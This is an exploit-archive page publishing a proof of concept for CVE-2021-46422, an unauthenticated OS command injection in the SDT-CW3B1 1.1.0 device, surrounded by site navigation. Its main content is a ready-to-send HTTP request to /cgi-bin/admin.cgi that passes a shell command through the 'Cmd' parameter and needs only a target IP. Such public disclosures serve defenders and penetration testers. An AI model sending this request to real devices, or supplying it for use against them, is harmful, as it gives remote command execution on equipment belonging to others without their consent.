SDT-CW3B1 1.1.0 Command Injection

SDT-CW3B1 1.1.0 Command Injection: Posted May 17, 2022; Authored by Ahmed Alroky; SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.; tags | exploit; advisories | CVE-2021-46422; SHA-256 | 8860761838526038594fcc60341f30b6ce5d75e287ff95719536bb39ccf39c13; Download | Favorite | View

SDT-CW3B1 1.1.0 Command Injection

# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
# Date: 2022-05-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# CVE : CVE-2021-46422

# Tested on: Windows

# HTTP Request
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: IP_HERE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: */*
Referer: http:// IP_HERE /admin/system_command.shtml
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Top Authors In Last 30 Days

Red Hat 240 files
indoushka 87 files
Ubuntu 85 files
Debian 22 files
LiquidWorm 21 files
Gentoo 8 files
Google Security Research 8 files
malvuln 5 files
Seth Jenkins 4 files
Emiliano Febbi 4 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,147)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,669)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,125)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,946)
UNIX (9,470)
UnixWare (188)
Windows (6,784)
Other

SDT-CW3B1 1.1.0 Command Injection

SDT-CW3B1 1.1.0 Command Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SDT-CW3B1 1.1.0 Command Injection

Share This

SDT-CW3B1 1.1.0 Command Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems